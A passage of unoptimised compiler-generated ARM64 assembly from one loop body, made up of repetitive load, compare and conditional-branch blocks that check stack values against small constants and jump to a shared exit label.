ldur x8, [x29, #-112] ; 8-byte Folded Reload
ldr w8, [x8]
ldr w10, [x9]
mov w9, #-1
mul w9, w9, w10
add w8, w8, w9
adds w8, w8, #1
cset w8, eq
tbnz w8, #0, LBB1_213
b LBB1_210
LBB1_210: ; in Loop: Header=BB1_70 Depth=1
ldr x8, [sp, #104] ; 8-byte Folded Reload
ldrsb w8, [x8]
subs w8, w8, #0
cset w8, ne
tbnz w8, #0, LBB1_213
b LBB1_211
LBB1_211: ; in Loop: Header=BB1_70 Depth=1
ldr x8, [sp, #680] ; 8-byte Folded Reload
ldr w8, [x8]
subs w8, w8, #4
cset w8, ne
tbnz w8, #0, LBB1_213
b LBB1_212
LBB1_212: ; in Loop: Header=BB1_70 Depth=1
ldr x8, [sp, #640] ; 8-byte Folded Reload
ldrsb w8, [x8]
subs w8, w8, #0
cset w8, ne
mov w9, #0
str w9, [sp, #20] ; 4-byte Folded Spill
tbnz w8, #0, LBB1_693
b LBB1_213
LBB1_213: ; in Loop: Header=BB1_70 Depth=1
ldr x8, [sp, #768] ; 8-byte Folded Reload
ldr w8, [x8]
subs w8, w8, #0
cset w8, ne
tbnz w8, #0, LBB1_215
b LBB1_214
LBB1_214: ; in Loop: Header=BB1_70 Depth=1
ldr x9, [sp, #888] ; 8-byte Folded Reload
ldr x8, [sp, #344] ; 8-byte Folded Reload
ldr w8, [x8]
ldr w9, [x9]
subs w8, w8, w9
cset w8, gt
tbnz w8, #0, LBB1_217
b LBB1_215
LBB1_215: ; in Loop: Header=BB1_70 Depth=1
ldr x8, [sp, #136] ; 8-byte Folded Reload
ldrsb w8, [x8]
subs w8, w8, #0
cset w8, eq
tbnz w8, #0, LBB1_217
b LBB1_216
LBB1_216: ; in Loop: Header=BB1_70 Depth=1
ldr x8, [sp, #672] ; 8-byte Folded Reload
ldrsb w8, [x8]
subs w8, w8, #0
cset w8, eq
mov w9, #0
str w9, [sp, #20] ; 4-byte Folded Spill
tbnz w8, #0, LBB1_693
b LBB1_217
LBB1_217: ; in Loop: Header=BB1_70 Depth=1
ldr x8, [sp, #136] ; 8-byte Folded Reload
ldrsb w8, [x8]
subs w8, w8, #0
cset w8, eq
tbnz w8, #0, LBB1_219
b LBB1_218
LBB1_218: ; in Loop: Header=BB1_70 Depth=1
ldr x8, [sp, #672] ; 8-byte Folded Reload
ldrsb w8, [x8]
subs w8, w8, #0
cset w8, eq
tbnz w8, #0, LBB1_220
b LBB1_219
LBB1_219: ; in Loop: Header=BB1_70 Depth=1
ldr x9, [sp, #344] ; 8-byte Folded Reload
ldr x8, [sp, #888] ; 8-byte Folded Reload
ldr w8, [x8]
ldr w9, [x9]
subs w8, w8, w9
cset w8, ne
mov w9, #0
str w9, [sp, #20] ; 4-byte Folded Spill
tbnz w8, #0, LBB1_693
b LBB1_220
LBB1_220: ; in Loop: Header=BB1_70 Depth=1
ldr x8, [sp, #672] ; 8-byte Folded Reload
ldrsb w8, [x8]
subs w8, w8, #0
cset w8, eq
tbnz w8, #0, LBB1_222
b LBB1_221
LBB1_221: ; in Loop: Header=BB1_70 Depth=1
ldr x9, [sp, #224] ; 8-byte Folded Reload
ldr x8, [sp, #768] ; 8-byte Folded Reload
ldr w8, [x8]
ldr w10, [x9]
mov w9, #-1
mul w9, w9, w10
add w8, w8, w9
subs w8, w8, #1
cset w8, ne
mov w9, #0
str w9, [sp, #20] ; 4-byte Folded Spill
tbnz w8, #0, LBB1_693
b LBB1_222
LBB1_222: ; in Loop: Header=BB1_70 Depth=1
ldr x8, [sp, #136] ; 8-byte Folded Reload
ldrsb w8, [x8]
subs w8, w8, #0
cset w8, ne
tbnz w8, #0, LBB1_225
b LBB1_223
LBB1_223: ; in Loop: Header=BB1_70 Depth=1
ldr x8, [sp, #672] ; 8-byte Folded Reload
ldrsb w8, [x8]
subs w8, w8, #0
cset w8, eq
tbnz w8, #0, LBB1_225
b LBB1_224
LBB1_224: ; in Loop: Header=BB1_70 Depth=1
ldr x9, [sp, #768] ; 8-byte Folded Reload
ldr x8, [sp, #888] ; 8-byte Folded Reload
ldr w8, [x8]
ldr w9, [x9]
subs w8, w8, w9
cset w8, gt
mov w9, #0
str w9, [sp, #20] ; 4-byte Folded Spill
tbnz w8, #0, LBB1_693
b LBB1_225
LBB1_225: ; in Loop: Header=BB1_70 Depth=1
ldr x8, [sp, #136] ; 8-byte Folded Reload
ldrsb w8, [x8]
subs w8, w8, #0
cset w8, ne
tbnz w8, #0, LBB1_229
b LBB1_226
LBB1_226: ; in Loop: Header=BB1_70 Depth=1
ldur x8, [x29, #-112] ; 8-byte Folded Reload
ldr w8, [x8]
subs w8, w8, #22
cset w8, ne
tbnz w8, #0, LBB1_229
b LBB1_227
LBB1_227: ; in Loop: Header=BB1_70 Depth=1
ldr x8, [sp, #512] ; 8-byte Folded Reload
ldr w8, [x8]
subs w8, w8, #0
cset w8, ne
tbnz w8, #0, LBB1_229
b LBB1_228
LBB1_228: ; in Loop: Header=BB1_70 Depth=1
ldr x8, [sp, #672] ; 8-byte Folded Reload
ldrsb w8, [x8]
subs w8, w8, #0
cset w8, eq
mov w9, #0
str w9, [sp, #20] ; 4-byte Folded Spill
tbnz w8, #0, LBB1_693
b LBB1_229
LBB1_229: ; in Loop: Header=BB1_70 Depth=1
ldr x9, [sp, #136] ; 8-byte Folded Reload
ldr x8, [sp, #672] ; 8-byte Folded Reload
ldrsb w8, [x8]
subs w8, w8, #0
cset w8, ne
and w8, w8, #0x1
ldrsb w9, [x9]
subs w9, w9, #0
cset w9, ne
and w9, w9, #0x1
subs w8, w8, w9
cset w8, eq
tbnz w8, #0, LBB1_234
b LBB1_230
LBB1_230: ; in Loop: Header=BB1_70 Depth=1
ldur x8, [x29, #-112] ; 8-byte Folded Reload
ldr w8, [x8]
subs w8, w8, #22
cset w8, ne
tbnz w8, #0, LBB1_233
b LBB1_231
LBB1_231: ; in Loop: Header=BB1_70 Depth=1
ldr x8, [sp, #512] ; 8-byte Folded Reload
ldr w8, [x8]
subs w8, w8, #0
cset w8, ne
tbnz w8, #0, LBB1_233
b LBB1_232
LBB1_232: ; in Loop: Header=BB1_70 Depth=1
ldr x8, [sp, #672] ; 8-byte Folded Reload
ldrsb w8, [x8]
subs w8, w8, #0
cset w8, eq
tbnz w8, #0, LBB1_234
b LBB1_233
LBB1_233: ; in Loop: Header=BB1_70 Depth=1
ldr x8, [sp, #680] ; 8-byte Folded Reload
ldr w8, [x8]
subs w8, w8, #5
cset w8, ne
mov w9, #0
str w9, [sp, #20] ; 4-byte Folded Spill
tbnz w8, #0, LBB1_693
b LBB1_234
LBB1_234: ; in Loop: Header=BB1_70 Depth=1
ldr x9, [sp, #512] ; 8-byte Folded Reload
ldur x8, [x29, #-112] ; 8-byte Folded Reload
ldr w8, [x8]
ldr w9, [x9]
subs w8, w8, w9
cset w8, eq
tbnz w8, #0, LBB1_237
b LBB1_235
LBB1_235: ; in Loop: Header=BB1_70 Depth=1
ldr x8, [sp, #680] ; 8-byte Folded Reload
ldr w8, [x8]
subs w8, w8, #5
cset w8, ne
tbnz w8, #0, LBB1_237
b LBB1_236
LBB1_236: ; in Loop: Header=BB1_70 Depth=1
ldr x9, [sp, #136] ; 8-byte Folded Reload
ldr x8, [sp, #672] ; 8-byte Folded Reload
ldrsb w8, [x8]
subs w8, w8, #0
cset w8, ne
and w8, w8, #0x1
ldrsb w9, [x9]
subs w9, w9, #0
cset w9, ne
and w9, w9, #0x1
subs w8, w8, w9
cset w8, eq
mov w9, #0
str w9, [sp, #20] ; 4-byte Folded Spill
tbnz w8, #0, LBB1_693
b LBB1_237
LBB1_237: ; in Loop: Header=BB1_70 Depth=1
ldr x9, [sp, #512] ; 8-byte Folded Reload
ldur x8, [x29, #-112] ; 8-byte Folded Reload
ldr w8, [x8]
ldr w10, [x9]
mov w9, #-1
mul w9, w9, w10
add w8, w8, w9
adds w8, w8, #1
cset w8, eq
tbnz w8, #0, LBB1_241
b LBB1_238
LBB1_238: ; in Loop: Header=BB1_70 Depth=1
ldr x8, [sp, #136] ; 8-byte Folded Reload
ldrsb w8, [x8]
subs w8, w8, #0
cset w8, ne
tbnz w8, #0, LBB1_241
b LBB1_239
LBB1_239: ; in Loop: Header=BB1_70 Depth=1
ldr x8, [sp, #680] ; 8-byte Folded Reload
ldr w8, [x8]
subs w8, w8, #5
cset w8, ne
tbnz w8, #0, LBB1_241
b LBB1_240
LBB1_240: ; in Loop: Header=BB1_70 Depth=1
ldr x8, [sp, #672] ; 8-byte Folded Reload
ldrsb w8, [x8]
subs w8, w8, #0
cset w8, ne
mov w9, #0
str w9, [sp, #20] ; 4-byte Folded Spill
tbnz w8, #0, LBB1_693
b LBB1_241
LBB1_241: ; in Loop: Header=BB1_70 Depth=1
ldr x8, [sp, #656] ; 8-byte Folded Reload
ldr w8, [x8]
subs w8, w8, #0
cset w8, ne
tbnz w8, #0, LBB1_243
b LBB1_242
LBB1_242: ; in Loop: Header=BB1_70 Depth=1
ldr x9, [sp, #928] ; 8-byte Folded Reload
ldr x8, [sp, #384] ; 8-byte Folded Reload
ldr w8, [x8]
ldr w9, [x9]
subs w8, w8, w9
cset w8, gt
tbnz w8, #0, LBB1_245
b LBB1_243
LBB1_243: ; in Loop: Header=BB1_70 Depth=1
ldr x8, [sp, #88] ; 8-byte Folded Reload
ldrsb w8, [x8]
subs w8, w8, #0
cset w8, eq
tbnz w8, #0, LBB1_245
b LBB1_244
LBB1_244: ; in Loop: Header=BB1_70 Depth=1
ldr x8, [sp, #624] ; 8-byte Folded Reload
ldrsb w8, [x8]
subs w8, w8, #0
cset w8, eq
mov w9, #0
str w9, [sp, #20] ; 4-byte Folded Spill
tbnz w8, #0, LBB1_693
b LBB1_245
LBB1_245: ; in Loop: Header=BB1_70 Depth=1
ldr x8, [sp, #88] ; 8-byte Folded Reload
ldrsb w8, [x8]
subs w8, w8, #0
cset w8, eq
tbnz w8, #0, LBB1_247
b LBB1_246
LBB1_246: ; in Loop: Header=BB1_70 Depth=1
ldr x8, [sp, #624] ; 8-byte Folded Reload
ldrsb w8, [x8]
subs w8, w8, #0
cset w8, eq
tbnz w8, #0, LBB1_248
b LBB1_247
LBB1_247: ; in Loop: Header=BB1_70 Depth=1
ldr x9, [sp, #384] ; 8-byte Folded Reload
ldr x8, [sp, #928] ; 8-byte Folded Reload
ldr w8, [x8]
ldr w9, [x9]
subs w8, w8, w9
cset w8, ne
mov w9, #0
str w9, [sp, #20] ; 4-byte Folded Spill
tbnz w8, #0, LBB1_693
b LBB1_248
LBB1_248: ; in Loop: Header=BB1_70 Depth=1
ldr x8, [sp, #624] ; 8-byte Folded Reload
ldrsb w8, [x8]
subs w8, w8, #0
cset w8, eq
tbnz w8, #0, LBB1_250
b LBB1_249
LBB1_249: ; in Loop: Header=BB1_70 Depth=1
ldr x9, [sp, #120] ; 8-byte Folded Reload
ldr x8, [sp, #656] ; 8-byte Folded Reload
ldr w8, [x8]
ldr w10, [x9]
mov w9, #-1
mul w9, w9, w10
add w8, w8, w9
subs w8, w8, #1
cset w8, ne
mov w9, #0
str w9, [sp, #20] ; 4-byte Folded Spill
tbnz w8, #0, LBB1_693
b LBB1_250
LBB1_250: ; in Loop: Header=BB1_70 Depth=1
ldr x8, [sp, #88] ; 8-byte Folded Reload
ldrsb w8, [x8]
subs w8, w8, #0
cset w8, ne
tbnz w8, #0, LBB1_253
b LBB1_251
LBB1_251: ; in Loop: Header=BB1_70 Depth=1
ldr x8, [sp, #624] ; 8-byte Folded Reload
ldrsb w8, [x8]
subs w8, w8, #0
cset w8, eq
tbnz w8, #0, LBB1_253
b LBB1_252
LBB1_252: ; in Loop: Header=BB1_70 Depth=1
ldr x9, [sp, #656] ; 8-byte Folded Reload
ldr x8, [sp, #928] ; 8-byte Folded Reload
ldr w8, [x8]
ldr w9, [x9]
subs w8, w8, w9
cset w8, gt
mov w9, #0
str w9, [sp, #20] ; 4-byte Folded Spill
tbnz w8, #0, LBB1_693
b LBB1_253
LBB1_253: ; in Loop: Header=BB1_70 Depth=1
ldr x8, [sp, #88] ; 8-byte Folded Reload
ldrsb w8, [x8]
subs w8, w8, #0
cset w8, ne
tbnz w8, #0, LBB1_257
b LBB1_254
LBB1_254: ; in Loop: Header=BB1_70 Depth=1
ldur x8, [x29, #-112] ; 8-byte Folded Reload
ldr w8, [x8]
subs w8, w8, #22
cset w8, ne
tbnz w8, #0, LBB1_257
b LBB1_255
LBB1_255: ; in Loop: Header=BB1_70 Depth=1
ldr x8, [sp, #512] ; 8-byte Folded Reload
ldr w8, [x8]
subs w8, w8, #0
cset w8, ne
tbnz w8, #0, LBB1_257
b LBB1_256
LBB1_256: ; in Loop: Header=BB1_70 Depth=1
ldr x8, [sp, #624] ; 8-byte Folded Reload
ldrsb w8, [x8]
subs w8, w8, #0
cset w8, eq
mov w9, #0
str w9, [sp, #20] ; 4-byte Folded Spill
tbnz w8, #0, LBB1_693
b LBB1_257
LBB1_257: ; in Loop: Header=BB1_70 Depth=1
ldr x9, [sp, #88] ; 8-byte Folded Reload
ldr x8, [sp, #624] ; 8-byte Folded Reload
ldrsb w8, [x8]
subs w8, w8, #0
cset w8, ne
and w8, w8, #0x1
ldrsb w9, [x9]
subs w9, w9, #0
cset w9, ne
and w9, w9, #0x1
subs w8, w8, w9
cset w8, eq
tbnz w8, #0, LBB1_262
b LBB1_258
LBB1_258: ; in Loop: Header=BB1_70 Depth=1
ldur x8, [x29, #-112] ; 8-byte Folded Reload
ldr w8, [x8]
subs w8, w8, #22
cset w8, ne
tbnz w8, #0, LBB1_261
b LBB1_259
LBB1_259: ; in Loop: Header=BB1_70 Depth=1
ldr x8, [sp, #512] ; 8-byte Folded Reload
ldr w8, [x8]
subs w8, w8, #0
cset w8, ne
tbnz w8, #0, LBB1_261
b LBB1_260
LBB1_260: ; in Loop: Header=BB1_70 Depth=1
ldr x8, [sp, #624] ; 8-byte Folded Reload
ldrsb w8, [x8]
subs w8, w8, #0
cset w8, eq
tbnz w8, #0, LBB1_262
b LBB1_261
LBB1_261: ; in Loop: Header=BB1_70 Depth=1
ldr x8, [sp, #680] ; 8-byte Folded Reload
ldr w8, [x8]
subs w8, w8, #6
cset w8, ne
mov w9, #0
str w9, [sp, #20] ; 4-byte Folded Spill
tbnz w8, #0, LBB1_693
b LBB1_262
LBB1_262: ; in Loop: Header=BB1_70 Depth=1
ldr x9, [sp, #512] ; 8-byte Folded Reload
ldur x8, [x29, #-112] ; 8-byte Folded Reload
ldr w8, [x8]
ldr w9, [x9]
subs w8, w8, w9
cset w8, eq
tbnz w8, #0, LBB1_265
b LBB1_263
LBB1_263: ; in Loop: Header=BB1_70 Depth=1
ldr x8, [sp, #680] ; 8-byte Folded Reload
ldr w8, [x8]
subs w8, w8, #6
cset w8, ne
tbnz w8, #0, LBB1_265
b LBB1_264
LBB1_264: ; in Loop: Header=BB1_70 Depth=1
ldr x9, [sp, #88] ; 8-byte Folded Reload
ldr x8, [sp, #624] ; 8-byte Folded Reload
ldrsb w8, [x8]
subs w8, w8, #0
cset w8, ne
and w8, w8, #0x1
ldrsb w9, [x9]
subs w9, w9, #0
cset w9, ne
and w9, w9, #0x1
subs w8, w8, w9
cset w8, eq
mov w9, #0
str w9, [sp, #20] ; 4-byte Folded Spill
tbnz w8, #0, LBB1_693
b LBB1_265
LBB1_265: ; in Loop: Header=BB1_70 Depth=1
ldr x9, [sp, #512] ; 8-byte Folded Reload
ldur x8, [x29, #-112] ; 8-byte Folded Reload
ldr w8, [x8]
ldr w10, [x9]
mov w9, #-1
mul w9, w9, w10
add w8, w8, w9
adds w8, w8, #1
cset w8, eq
tbnz w8, #0, LBB1_269
b LBB1_266
LBB1_266: ; in Loop: Header=BB1_70 Depth=1
ldr x8, [sp, #88] ; 8-byte Folded Reload
ldrsb w8, [x8]
subs w8, w8, #0
cset w8, ne
tbnz w8, #0, LBB1_269
b LBB1_267
LBB1_267: ; in Loop: Header=BB1_70 Depth=1
ldr x8, [sp, #680] ; 8-byte Folded Reload
ldr w8, [x8]
subs w8, w8, #6
cset w8, ne
tbnz w8, #0, LBB1_269
b LBB1_268
LBB1_268: ; in Loop: Header=BB1_70 Depth=1
ldr x8, [sp, #624] ; 8-byte Folded Reload
ldrsb w8, [x8]
subs w8, w8, #0
cset w8, ne
mov w9, #0
str w9, [sp, #20] ; 4-byte Folded Spill
tbnz w8, #0, LBB1_693
b LBB1_269
LBB1_269: ; in Loop: Header=BB1_70 Depth=1
ldr x8, [sp, #664] ; 8-byte Folded Reload
ldr w8, [x8]
subs w8, w8, #0
cset w8, ne
tbnz w8, #0, LBB1_271
b LBB1_270
LBB1_270: ; in Loop: Header=BB1_70 Depth=1
ldur x9, [x29, #-248] ; 8-byte Folded Reload
ldr x8, [sp, #424] ; 8-byte Folded Reload
ldr w8, [x8]
ldr w9, [x9]
subs w8, w8, w9
cset w8, gt
tbnz w8, #0, LBB1_273
b LBB1_271
LBB1_271: ; in Loop: Header=BB1_70 Depth=1
ldr x8, [sp, #80] ; 8-byte Folded Reload
ldrsb w8, [x8]
subs w8, w8, #0
cset w8, eq
tbnz w8, #0, LBB1_273
b LBB1_272
LBB1_272: ; in Loop: Header=BB1_70 Depth=1
ldr x8, [sp, #616] ; 8-byte Folded Reload
ldrsb w8, [x8]
subs w8, w8, #0
cset w8, eq
mov w9, #0
str w9, [sp, #20] ; 4-byte Folded Spill
tbnz w8, #0, LBB1_693
b LBB1_273
LBB1_273: ; in Loop: Header=BB1_70 Depth=1
ldr x8, [sp, #80] ; 8-byte Folded Reload
ldrsb w8, [x8]
subs w8, w8, #0
cset w8, eq
tbnz w8, #0, LBB1_275
b LBB1_274
LBB1_274: ; in Loop: Header=BB1_70 Depth=1
ldr x8, [sp, #616] ; 8-byte Folded Reload
ldrsb w8, [x8]
subs w8, w8, #0
cset w8, eq
tbnz w8, #0, LBB1_276
b LBB1_275
LBB1_275: ; in Loop: Header=BB1_70 Depth=1
ldr x9, [sp, #424] ; 8-byte Folded Reload
ldur x8, [x29, #-248] ; 8-byte Folded Reload
ldr w8, [x8]
ldr w9, [x9]
subs w8, w8, w9
cset w8, ne
mov w9, #0
str w9, [sp, #20] ; 4-byte Folded Spill
tbnz w8, #0, LBB1_693
b LBB1_276
LBB1_276: ; in Loop: Header=BB1_70 Depth=1
ldr x8, [sp, #616] ; 8-byte Folded Reload
ldrsb w8, [x8]
subs w8, w8, #0
cset w8, eq
tbnz w8, #0, LBB1_278
b LBB1_277
LBB1_277: ; in Loop: Header=BB1_70 Depth=1
ldr x9, [sp, #128] ; 8-byte Folded Reload
ldr x8, [sp, #664] ; 8-byte Folded Reload
ldr w8, [x8]
ldr w10, [x9]
mov w9, #-1
mul w9, w9, w10
add w8, w8, w9
subs w8, w8, #1
cset w8, ne
mov w9, #0
str w9, [sp, #20] ; 4-byte Folded Spill
tbnz w8, #0, LBB1_693
b LBB1_278
LBB1_278: ; in Loop: Header=BB1_70 Depth=1
ldr x8, [sp, #80] ; 8-byte Folded Reload
ldrsb w8, [x8]
subs w8, w8, #0
cset w8, ne
tbnz w8, #0, LBB1_281
b LBB1_279
LBB1_279: ; in Loop: Header=BB1_70 Depth=1
ldr x8, [sp, #616] ; 8-byte Folded Reload
ldrsb w8, [x8]
subs w8, w8, #0
cset w8, eq
tbnz w8, #0, LBB1_281
b LBB1_280
LBB1_280: ; in Loop: Header=BB1_70 Depth=1
ldr x9, [sp, #664] ; 8-byte Folded Reload
ldur x8, [x29, #-248] ; 8-byte Folded Reload
ldr w8, [x8]
ldr w9, [x9]
subs w8, w8, w9
cset w8, gt
mov w9, #0
str w9, [sp, #20] ; 4-byte Folded Spill
tbnz w8, #0, LBB1_693
b LBB1_281
LBB1_281: ; in Loop: Header=BB1_70 Depth=1
ldr x8, [sp, #80] ; 8-byte Folded Reload
ldrsb w8, [x8]
subs w8, w8, #0
cset w8, ne
tbnz w8, #0, LBB1_285
b LBB1_282
LBB1_282: ; in Loop: Header=BB1_70 Depth=1
ldur x8, [x29, #-112] ; 8-byte Folded Reload
ldr w8, [x8]
subs w8, w8, #22
cset w8, ne
tbnz w8, #0, LBB1_285
b LBB1_283
LBB1_283: ; in Loop: Header=BB1_70 Depth=1
ldr x8, [sp, #512] ; 8-byte Folded Reload
ldr w8, [x8]
subs w8, w8, #0
cset w8, ne
tbnz w8, #0, LBB1_285
b LBB1_284
LBB1_284: ; in Loop: Header=BB1_70 Depth=1
ldr x8, [sp, #616] ; 8-byte Folded Reload
ldrsb w8, [x8]
subs w8, w8, #0
cset w8, eq
mov w9, #0
str w9, [sp, #20] ; 4-byte Folded Spill
tbnz w8, #0, LBB1_693
b LBB1_285
LBB1_285: ; in Loop: Header=BB1_70 Depth=1
ldr x9, [sp, #80] ; 8-byte Folded Reload
ldr x8, [sp, #616] ; 8-byte Folded Reload
ldrsb w8, [x8]
subs w8, w8, #0
cset w8, ne
and w8, w8, #0x1
ldrsb w9, [x9]
subs w9, w9, #0
cset w9, ne
and w9, w9, #0x1
subs w8, w8, w9
cset w8, eq
tbnz w8, #0, LBB1_290
b LBB1_286
LBB1_286: ; in Loop: Header=BB1_70 Depth=1
ldur x8, [x29, #-112] ; 8-byte Folded Reload
ldr w8, [x8]
subs w8, w8, #22
cset w8, ne
tbnz w8, #0, LBB1_289
b LBB1_287
LBB1_287: ; in Loop: Header=BB1_70 Depth=1
ldr x8, [sp, #512] ; 8-byte Folded Reload
ldr w8, [x8]
subs w8, w8, #0
cset w8, ne
tbnz w8, #0, LBB1_289
b LBB1_288
LBB1_288: ; in Loop: Header=BB1_70 Depth=1
ldr x8, [sp, #616] ; 8-byte Folded Reload
ldrsb w8, [x8]
subs w8, w8, #0
cset w8, eq
tbnz w8, #0, LBB1_290
b LBB1_289
LBB1_289: ; in Loop: Header=BB1_70 Depth=1
ldr x8, [sp, #680] ; 8-byte Folded Reload
ldr w8, [x8]
subs w8, w8, #7
cset w8, ne
mov w9, #0
str w9, [sp, #20] ; 4-byte Folded Spill
tbnz w8, #0, LBB1_693
b LBB1_290
LBB1_290: ; in Loop: Header=BB1_70 Depth=1
ldr x9, [sp, #512] ; 8-byte Folded Reload
ldur x8, [x29, #-112] ; 8-byte Folded Reload
ldr w8, [x8]
ldr w9, [x9]
subs w8, w8, w9
cset w8, eq
tbnz w8, #0, LBB1_293
b LBB1_291
LBB1_291: ; in Loop: Header=BB1_70 Depth=1
ldr x8, [sp, #680] ; 8-byte Folded Reload
ldr w8, [x8]
subs w8, w8, #7
cset w8, ne
tbnz w8, #0, LBB1_293
b LBB1_292
LBB1_292: ; in Loop: Header=BB1_70 Depth=1
ldr x9, [sp, #80] ; 8-byte Folded Reload
ldr x8, [sp, #616] ; 8-byte Folded Reload
ldrsb w8, [x8]
subs w8, w8, #0
cset w8, ne
and w8, w8, #0x1
ldrsb w9, [x9]
subs w9, w9, #0
cset w9, ne
and w9, w9, #0x1
subs w8, w8, w9
cset w8, eq
mov w9, #0
str w9, [sp, #20] ; 4-byte Folded Spill
tbnz w8, #0, LBB1_693
b LBB1_293
LBB1_293: ; in Loop: Header=BB1_70 Depth=1
ldr x9, [sp, #512] ; 8-byte Folded Reload
ldur x8, [x29, #-112] ; 8-byte Folded Reload
ldr w8, [x8]
ldr w10, [x9]
mov w9, #-1
mul w9, w9, w10
add w8, w8, w9
adds w8, w8, #1
cset w8, eq
tbnz w8, #0, LBB1_297
b LBB1_294
LBB1_294: ; in Loop: Header=BB1_70 Depth=1
ldr x8, [sp, #80] ; 8-byte Folded Reload
ldrsb w8, [x8]
subs w8, w8, #0
cset w8, ne
tbnz w8, #0, LBB1_297
b LBB1_295
LBB1_295: ; in Loop: Header=BB1_70 Depth=1
ldr x8, [sp, #680] ; 8-byte Folded Reload
ldr w8, [x8]
subs w8, w8, #7
cset w8, ne
tbnz w8, #0, LBB1_297
b LBB1_296
LBB1_296: ; in Loop: Header=BB1_70 Depth=1
ldr x8, [sp, #616] ; 8-byte Folded Reload
ldrsb w8, [x8]
subs w8, w8, #0
cset w8, ne
mov w9, #0
str w9, [sp, #20] ; 4-byte Folded Spill
tbnz w8, #0, LBB1_693
b LBB1_297
LBB1_297: ; in Loop: Header=BB1_70 Depth=1
ldr x8, [sp, #632] ; 8-byte Folded Reload
ldr w8, [x8]
subs w8, w8, #0
cset w8, ne
tbnz w8, #0, LBB1_299
b LBB1_298
LBB1_298: ; in Loop: Header=BB1_70 Depth=1
ldur x9, [x29, #-216] ; 8-byte Folded Reload
ldr x8, [sp, #456] ; 8-byte Folded Reload
ldr w8, [x8]
ldr w9, [x9]
subs w8, w8, w9
cset w8, gt
tbnz w8, #0, LBB1_301
b LBB1_299
LBB1_299: ; in Loop: Header=BB1_70 Depth=1
ldr x8, [sp, #168] ; 8-byte Folded Reload
ldrsb w8, [x8]
subs w8, w8, #0
cset w8, eq
tbnz w8, #0, LBB1_301
b LBB1_300
LBB1_300: ; in Loop: Header=BB1_70 Depth=1
ldr x8, [sp, #712] ; 8-byte Folded Reload
ldrsb w8, [x8]
subs w8, w8, #0
cset w8, eq
mov w9, #0
str w9, [sp, #20] ; 4-byte Folded Spill
tbnz w8, #0, LBB1_693
b LBB1_301
LBB1_301: ; in Loop: Header=BB1_70 Depth=1
ldr x8, [sp, #168] ; 8-byte Folded Reload
ldrsb w8, [x8]
subs w8, w8, #0
cset w8, eq
tbnz w8, #0, LBB1_303
b LBB1_302
LBB1_302: ; in Loop: Header=BB1_70 Depth=1
ldr x8, [sp, #712] ; 8-byte Folded Reload
ldrsb w8, [x8]
subs w8, w8, #0
cset w8, eq
tbnz w8, #0, LBB1_304
b LBB1_303
LBB1_303: ; in Loop: Header=BB1_70 Depth=1
ldr x9, [sp, #456] ; 8-byte Folded Reload
ldur x8, [x29, #-216] ; 8-byte Folded Reload
ldr w8, [x8]
ldr w9, [x9]
subs w8, w8, w9
cset w8, ne
mov w9, #0
str w9, [sp, #20] ; 4-byte Folded Spill
tbnz w8, #0, LBB1_693
b LBB1_304
LBB1_304: ; in Loop: Header=BB1_70 Depth=1
ldr x8, [sp, #712] ; 8-byte Folded Reload
ldrsb w8, [x8]
subs w8, w8, #0
cset w8, eq
tbnz w8, #0, LBB1_306
b LBB1_305
LBB1_305: ; in Loop: Header=BB1_70 Depth=1
ldr x9, [sp, #96] ; 8-byte Folded Reload
ldr x8, [sp, #632] ; 8-byte Folded Reload
ldr w8, [x8]
ldr w10, [x9]
mov w9, #-1
mul w9, w9, w10
add w8, w8, w9
subs w8, w8, #1
cset w8, ne
mov w9, #0
str w9, [sp, #20] ; 4-byte Folded Spill
tbnz w8, #0, LBB1_693
b LBB1_306
LBB1_306: ; in Loop: Header=BB1_70 Depth=1
ldr x8, [sp, #168] ; 8-byte Folded Reload
ldrsb w8, [x8]
subs w8, w8, #0
cset w8, ne
tbnz w8, #0, LBB1_309
b LBB1_307
LBB1_307: ; in Loop: Header=BB1_70 Depth=1
ldr x8, [sp, #712] ; 8-byte Folded Reload
ldrsb w8, [x8]
subs w8, w8, #0
cset w8, eq
tbnz w8, #0, LBB1_309
b LBB1_308
LBB1_308: ; in Loop: Header=BB1_70 Depth=1
ldr x9, [sp, #632] ; 8-byte Folded Reload
ldur x8, [x29, #-216] ; 8-byte Folded Reload
ldr w8, [x8]
ldr w9, [x9]
subs w8, w8, w9
cset w8, gt
mov w9, #0
str w9, [sp, #20] ; 4-byte Folded Spill
tbnz w8, #0, LBB1_693
b LBB1_309
LBB1_309: ; in Loop: Header=BB1_70 Depth=1
ldr x8, [sp, #168] ; 8-byte Folded Reload
ldrsb w8, [x8]
subs w8, w8, #0
cset w8, ne
tbnz w8, #0, LBB1_313
b LBB1_310
LBB1_310: ; in Loop: Header=BB1_70 Depth=1
ldur x8, [x29, #-112] ; 8-byte Folded Reload
ldr w8, [x8]
subs w8, w8, #22
cset w8, ne
tbnz w8, #0, LBB1_313
b LBB1_311
LBB1_311: ; in Loop: Header=BB1_70 Depth=1
ldr x8, [sp, #512] ; 8-byte Folded Reload
ldr w8, [x8]
subs w8, w8, #0
cset w8, ne
tbnz w8, #0, LBB1_313
b LBB1_312
LBB1_312: ; in Loop: Header=BB1_70 Depth=1
ldr x8, [sp, #712] ; 8-byte Folded Reload
ldrsb w8, [x8]
subs w8, w8, #0
cset w8, eq
mov w9, #0
str w9, [sp, #20] ; 4-byte Folded Spill
tbnz w8, #0, LBB1_693
b LBB1_313
LBB1_313: ; in Loop: Header=BB1_70 Depth=1
ldr x9, [sp, #168] ; 8-byte Folded Reload
ldr x8, [sp, #712] ; 8-byte Folded Reload
ldrsb w8, [x8]
subs w8, w8, #0
cset w8, ne
and w8, w8, #0x1
ldrsb w9, [x9]
subs w9, w9, #0
cset w9, ne
and w9, w9, #0x1
subs w8, w8, w9
cset w8, eq
tbnz w8, #0, LBB1_318
b LBB1_314
LBB1_314: ; in Loop: Header=BB1_70 Depth=1
ldur x8, [x29, #-112] ; 8-byte Folded Reload
ldr w8, [x8]
subs w8, w8, #22
cset w8, ne
tbnz w8, #0, LBB1_317
b LBB1_315
LBB1_315: ; in Loop: Header=BB1_70 Depth=1
ldr x8, [sp, #512] ; 8-byte Folded Reload
ldr w8, [x8]
subs w8, w8, #0
cset w8, ne
tbnz w8, #0, LBB1_317
b LBB1_316
LBB1_316: ; in Loop: Header=BB1_70 Depth=1
ldr x8, [sp, #712] ; 8-byte Folded Reload
ldrsb w8, [x8]
subs w8, w8, #0
cset w8, eq
tbnz w8, #0, LBB1_318
b LBB1_317
LBB1_317: ; in Loop: Header=BB1_70 Depth=1
ldr x8, [sp, #680] ; 8-byte Folded Reload
ldr w8, [x8]
subs w8, w8, #8
cset w8, ne
mov w9, #0
str w9, [sp, #20] ; 4-byte Folded Spill
